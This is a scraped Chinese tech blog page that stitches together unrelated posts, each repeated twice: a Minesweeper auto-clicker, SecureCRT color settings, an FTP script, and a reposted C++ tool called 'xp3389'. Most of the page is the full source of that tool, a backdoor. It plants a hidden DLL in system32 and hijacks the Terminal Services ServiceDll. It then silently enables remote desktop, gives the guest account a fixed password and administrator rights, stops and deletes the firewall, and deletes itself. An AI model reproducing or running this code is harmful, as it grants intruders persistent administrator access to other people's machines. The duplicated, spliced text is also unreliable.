Python 扫雷工具
[ 2012/03/01 13:53 | by selboo ]
先说下原理,原理其实很简单,设法获得“雷区”的数据,然后通过模拟鼠标动作,点击雷区上非地雷的的格子,就搞定了:) 所以技术难点只有三个:获得雷区数据、找到扫雷程序和模拟鼠标动作。
先说简单的,找到扫雷程序。通过win32gui.FindWindow("扫雷", "扫雷") 就可以找到扫雷程序的主窗体了,很简单吧。FindWindow这个API参数含义参看MSDN.然后是模拟鼠标点击动作,这也很简单,通过win32api.SendMessage来向窗体发送鼠标的按下WM_LBUTTONDOWN和松开WM_LBUTTONUP消息就行了,这个api的主要参数是,接收信息的窗体句柄(这里是扫雷程序的主窗体)和鼠标点击的坐标。这个api的使用不难,具体参考MSDN:)
比较有难度的是如何获得雷区数据。这里有两个事情要做,首先要找出雷区在程序内部是如何表示的,如何区分格子是有雷还是无雷
先说简单的,找到扫雷程序。通过win32gui.FindWindow("扫雷", "扫雷") 就可以找到扫雷程序的主窗体了,很简单吧。FindWindow这个API参数含义参看MSDN.然后是模拟鼠标点击动作,这也很简单,通过win32api.SendMessage来向窗体发送鼠标的按下WM_LBUTTONDOWN和松开WM_LBUTTONUP消息就行了,这个api的主要参数是,接收信息的窗体句柄(这里是扫雷程序的主窗体)和鼠标点击的坐标。这个api的使用不难,具体参考MSDN:)
比较有难度的是如何获得雷区数据。这里有两个事情要做,首先要找出雷区在程序内部是如何表示的,如何区分格子是有雷还是无雷
SecureCRT显示彩色脚本
[ 2009/06/26 16:57 | by selboo ]
在vi 编辑下,显示彩色脚本内容,这样更加方便与修改查看
打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"
在系统安装 vim
查看是否安装有vim
[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$
确定有的话,直接在/etc/profile文件中加入如下的这一行即可,(不过要重装进入终端才行)
alias vi=vim
第二种方法
1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句
打开 SecureCRT 选项 => 会话选项 => 仿真 终端选择 "Xterm" 再选中后面的"ANSI Color"
在系统安装 vim
查看是否安装有vim
[selboo@selboo ~]$ rpm -qa |grep vim
vim-enhanced-7.0.109-4.el5_2.4z
vim-minimal-7.0.109-4.el5_2.4z
vim-common-7.0.109-4.el5_2.4z
[selboo@selboo ~]$
确定有的话,直接在/etc/profile文件中加入如下的这一行即可,(不过要重装进入终端才行)
alias vi=vim
第二种方法
1> secureCRT的设置。确保仿真终端类型为linux,并勾选“ANSI颜色选项”。
2> 服务器端的设置。在.bashrc中添加:export TERM=xterm 语句
作者:cooldiyer
来源:红狼
很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
代码:
xp3389_bin.rar
下载文件 (已下载 832 次)
xp3389_src.rar下载文件 (已下载 271 次)
来源:红狼
很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
代码:
// xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer
//
#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
#include "stdafx.h"
#include "resource.h"
#include
#include
DWORD
GetProcessId(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;
HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP)
{
pe.dwSize = sizeof( pe );
for (dwRet = Process32First(hSP, &pe);
dwRet;
dwRet = Process32Next(hSP, &pe))
{
if (lstrcmpi( szProcName, pe.szExeFile) == 0)
{
dwPid = pe.th32ProcessID;
bFound = TRUE;
break;
}
}
CloseHandle(hSP);
if (bFound == TRUE)
{
return dwPid;
}
}
return NULL;
}
bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
if (!IsWindowVisible(hwnd))
return true;
DWORD dwWindowThreadId = NULL;
DWORD dwLsassId = (DWORD)lParam;
GetWindowThreadProcessId(hwnd, &dwWindowThreadId);
if (dwWindowThreadId == (DWORD)lParam)
{
// 关闭指定进程的窗口
SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return true;
}
// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114
int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)
{
HKEY hKey;
DWORD dwDisposition;
int iResult =0;
__try
{
// SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
switch(Mode)
{
case 0:
if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)
__leave;
case 1:
if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
switch(Type)
{
case REG_SZ:
case REG_EXPAND_SZ:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)
iResult =1;
break;
case REG_DWORD:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)
iResult =1;
break;
case REG_BINARY:
break;
}
break;
case 2:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)
iResult =1;
break;
case 3:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)
iResult =1;
break;
}
}
__finally
{
RegCloseKey(MainKey);
RegCloseKey(hKey);
}
return iResult;
}
bool DebugPrivilege(const char *PName, BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
if (GetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
CloseHandle(hToken);
return bResult;
}
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
{
HANDLE hRemoteThread;
HANDLE hProcess;
if (hModuleHandle == NULL)
return false;
hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
if (hProcess == NULL)
return false;
HMODULE hModule=::GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, “FreeLibrary”);
hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);
if(hRemoteThread==NULL)
{
::CloseHandle(hProcess);
return false;
}
::WaitForSingleObject(hRemoteThread,INFINITE);
::CloseHandle(hProcess);
::CloseHandle(hRemoteThread);
return true;
}
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
{
HANDLE hModuleHandle = NULL;
MODULEENTRY32 me32={0};
HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(::Module32First(hModuleSnap, &me32))
{
do
{
if (!lstrcmpi(me32.szExePath, lpModulePath))
{
hModuleHandle = me32.hModule;
break;
}
}while(::Module32Next(hModuleSnap,&me32));
}
::CloseHandle(hModuleSnap);
return hModuleHandle;
}
bool UnloadModule(LPCTSTR lpModulePath)
{
BOOL bRet = false;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//查找相关的进程
if(::Process32First(hProcessSnap, &pe32))
{
do
{
HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
if (hModuleHandle != NULL)
{
bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
}
}while (Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
return bRet;
}
void StartService(LPCTSTR lpService)
{
SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
if ( NULL != hSCManager )
{
SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
if ( NULL != hService )
{
StartService(hService, 0, NULL);
CloseServiceHandle( hService );
}
CloseServiceHandle( hSCManager );
}
}
BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
void SetReg()
{
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService”,”Start”,REG_DWORD,NULL,2,0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”, “KeepRASConnections”, REG_SZ, “1″, 0, 0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server”, “fDenyTSConnections”, REG_DWORD, NULL, 0, 0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core”, “EnableConcurrentSessions”,
REG_DWORD, NULL, 1, 0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters”, “ServiceDll”, REG_EXPAND_SZ,
“%SystemRoot%\\system32\\termsrvhack.dll”, 0, 0);
}
void ReleaseDll()
{
char strSystemPath[MAX_PATH];
char strDllcachePath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));
lstrcat(strSystemPath, “\\termsrvhack.dll”);
lstrcat(strDllcachePath, “\\dllcache\\termsrvhack.dll”);
ReleaseResource(IDR_DLL, “BIN”, strSystemPath);
ReleaseResource(IDR_DLL, “BIN”, strDllcachePath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
}
bool IsOSXP()
{
OSVERSIONINFOEX OsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // 注意转换类型
return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;
}
void HijackService()
{
char strDll[MAX_PATH];
GetSystemDirectory(strDll, sizeof(strDll));
lstrcat(strDll, “\\termsrv.dll”);
// 释放termsrvhack.dll
ReleaseDll();
// 遍历进程卸载现在加载的DLL
DebugPrivilege(SE_DEBUG_NAME, TRUE);
if (!UnloadModule(strDll))
return;
DebugPrivilege(SE_DEBUG_NAME, FALSE);
// 关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框
// 对进程赋予关闭权限
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
DWORD dwLsassId = GetProcessId(”csrss.exe”);
while (!AbortSystemShutdown(NULL))
{
// 一些系统是会弹出drwtsn32.exe
DWORD dwDrwtsn32Id = GetProcessId(”drwtsn32.exe”);
if (dwDrwtsn32Id != NULL)
{
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);
}
// 模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);
Sleep(10);
}
DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);
}
int WINAPI WinMain(
HINSTANCE hInstance, // handle to current instance
HINSTANCE hPrevInstance, // handle to previous instance
LPSTR lpCmdLine, // command line
int nCmdShow // show state
)
{
// 一些注册表的操作
SetReg();
if (IsOSXP())
{
// 替换DLL
HijackService();
}
// 开始终端服务
StartService(”TermService”);
// 激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它
char strCommand[1024];
char strSelf[MAX_PATH];
GetModuleFileName(NULL, strSelf, sizeof(strSelf));
wsprintf(strCommand, “cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del \”%s\” && sc delete SharedAccess”, strSelf);
WinExec(strCommand, SW_HIDE);
return 0;
}
//
#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
#include "stdafx.h"
#include "resource.h"
#include
#include
DWORD
GetProcessId(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;
HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP)
{
pe.dwSize = sizeof( pe );
for (dwRet = Process32First(hSP, &pe);
dwRet;
dwRet = Process32Next(hSP, &pe))
{
if (lstrcmpi( szProcName, pe.szExeFile) == 0)
{
dwPid = pe.th32ProcessID;
bFound = TRUE;
break;
}
}
CloseHandle(hSP);
if (bFound == TRUE)
{
return dwPid;
}
}
return NULL;
}
bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
if (!IsWindowVisible(hwnd))
return true;
DWORD dwWindowThreadId = NULL;
DWORD dwLsassId = (DWORD)lParam;
GetWindowThreadProcessId(hwnd, &dwWindowThreadId);
if (dwWindowThreadId == (DWORD)lParam)
{
// 关闭指定进程的窗口
SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return true;
}
// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114
int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)
{
HKEY hKey;
DWORD dwDisposition;
int iResult =0;
__try
{
// SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
switch(Mode)
{
case 0:
if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)
__leave;
case 1:
if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
switch(Type)
{
case REG_SZ:
case REG_EXPAND_SZ:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)
iResult =1;
break;
case REG_DWORD:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)
iResult =1;
break;
case REG_BINARY:
break;
}
break;
case 2:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)
iResult =1;
break;
case 3:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)
iResult =1;
break;
}
}
__finally
{
RegCloseKey(MainKey);
RegCloseKey(hKey);
}
return iResult;
}
bool DebugPrivilege(const char *PName, BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
if (GetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
CloseHandle(hToken);
return bResult;
}
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
{
HANDLE hRemoteThread;
HANDLE hProcess;
if (hModuleHandle == NULL)
return false;
hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
if (hProcess == NULL)
return false;
HMODULE hModule=::GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, “FreeLibrary”);
hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);
if(hRemoteThread==NULL)
{
::CloseHandle(hProcess);
return false;
}
::WaitForSingleObject(hRemoteThread,INFINITE);
::CloseHandle(hProcess);
::CloseHandle(hRemoteThread);
return true;
}
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
{
HANDLE hModuleHandle = NULL;
MODULEENTRY32 me32={0};
HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(::Module32First(hModuleSnap, &me32))
{
do
{
if (!lstrcmpi(me32.szExePath, lpModulePath))
{
hModuleHandle = me32.hModule;
break;
}
}while(::Module32Next(hModuleSnap,&me32));
}
::CloseHandle(hModuleSnap);
return hModuleHandle;
}
bool UnloadModule(LPCTSTR lpModulePath)
{
BOOL bRet = false;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//查找相关的进程
if(::Process32First(hProcessSnap, &pe32))
{
do
{
HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
if (hModuleHandle != NULL)
{
bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
}
}while (Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
return bRet;
}
void StartService(LPCTSTR lpService)
{
SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
if ( NULL != hSCManager )
{
SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
if ( NULL != hService )
{
StartService(hService, 0, NULL);
CloseServiceHandle( hService );
}
CloseServiceHandle( hSCManager );
}
}
BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
void SetReg()
{
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService”,”Start”,REG_DWORD,NULL,2,0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”, “KeepRASConnections”, REG_SZ, “1″, 0, 0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server”, “fDenyTSConnections”, REG_DWORD, NULL, 0, 0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core”, “EnableConcurrentSessions”,
REG_DWORD, NULL, 1, 0);
WriteRegEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters”, “ServiceDll”, REG_EXPAND_SZ,
“%SystemRoot%\\system32\\termsrvhack.dll”, 0, 0);
}
void ReleaseDll()
{
char strSystemPath[MAX_PATH];
char strDllcachePath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath));
lstrcat(strSystemPath, “\\termsrvhack.dll”);
lstrcat(strDllcachePath, “\\dllcache\\termsrvhack.dll”);
ReleaseResource(IDR_DLL, “BIN”, strSystemPath);
ReleaseResource(IDR_DLL, “BIN”, strDllcachePath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
}
bool IsOSXP()
{
OSVERSIONINFOEX OsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // 注意转换类型
return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1;
}
void HijackService()
{
char strDll[MAX_PATH];
GetSystemDirectory(strDll, sizeof(strDll));
lstrcat(strDll, “\\termsrv.dll”);
// 释放termsrvhack.dll
ReleaseDll();
// 遍历进程卸载现在加载的DLL
DebugPrivilege(SE_DEBUG_NAME, TRUE);
if (!UnloadModule(strDll))
return;
DebugPrivilege(SE_DEBUG_NAME, FALSE);
// 关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框
// 对进程赋予关闭权限
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
DWORD dwLsassId = GetProcessId(”csrss.exe”);
while (!AbortSystemShutdown(NULL))
{
// 一些系统是会弹出drwtsn32.exe
DWORD dwDrwtsn32Id = GetProcessId(”drwtsn32.exe”);
if (dwDrwtsn32Id != NULL)
{
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);
}
// 模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);
Sleep(10);
}
DebugPrivilege(SE_SHUTDOWN_NAME, FALSE);
}
int WINAPI WinMain(
HINSTANCE hInstance, // handle to current instance
HINSTANCE hPrevInstance, // handle to previous instance
LPSTR lpCmdLine, // command line
int nCmdShow // show state
)
{
// 一些注册表的操作
SetReg();
if (IsOSXP())
{
// 替换DLL
HijackService();
}
// 开始终端服务
StartService(”TermService”);
// 激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它
char strCommand[1024];
char strSelf[MAX_PATH];
GetModuleFileName(NULL, strSelf, sizeof(strSelf));
wsprintf(strCommand, “cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del \”%s\” && sc delete SharedAccess”, strSelf);
WinExec(strCommand, SW_HIDE);
return 0;
}
xp3389_bin.rar
下载文件 (已下载 832 次)xp3389_src.rar
下载文件 (已下载 271 次)linux下脚本实现自动ftp
[ 2009/02/18 20:44 | by selboo ]
建立一个文本文件,例如文件名是ftp.txt,其内容如下:
open 192.168.1.50 /*用open连接远程服务器192.168.1.50*/
user MYNAME MYPASSWORD /*MYNAME是用户名,MYPASSWORD是密码*/
binary /*以二进制传送*/
hash /*当有数据传送时,显示#号*/
cd REMOTE_PATHNAME /*进入远程目标路径REMOTE_PATHNAME*/
get REMOTE_FILE LOCAL_FILE /*把远程文件REMOTE_FILE下载成本地文件LOCAL_FILE*/
put LOCAL_FILE REMOTE_FILE /*将本地文件LOCAL_FILE上传成远程文件REMOTE_FILE */
bye /*退出ftp应用*/
执行命令:
cat ftp.txt | ftp -n
open 192.168.1.50 /*用open连接远程服务器192.168.1.50*/
user MYNAME MYPASSWORD /*MYNAME是用户名,MYPASSWORD是密码*/
binary /*以二进制传送*/
hash /*当有数据传送时,显示#号*/
cd REMOTE_PATHNAME /*进入远程目标路径REMOTE_PATHNAME*/
get REMOTE_FILE LOCAL_FILE /*把远程文件REMOTE_FILE下载成本地文件LOCAL_FILE*/
put LOCAL_FILE REMOTE_FILE /*将本地文件LOCAL_FILE上传成远程文件REMOTE_FILE */
bye /*退出ftp应用*/
执行命令:
cat ftp.txt | ftp -n
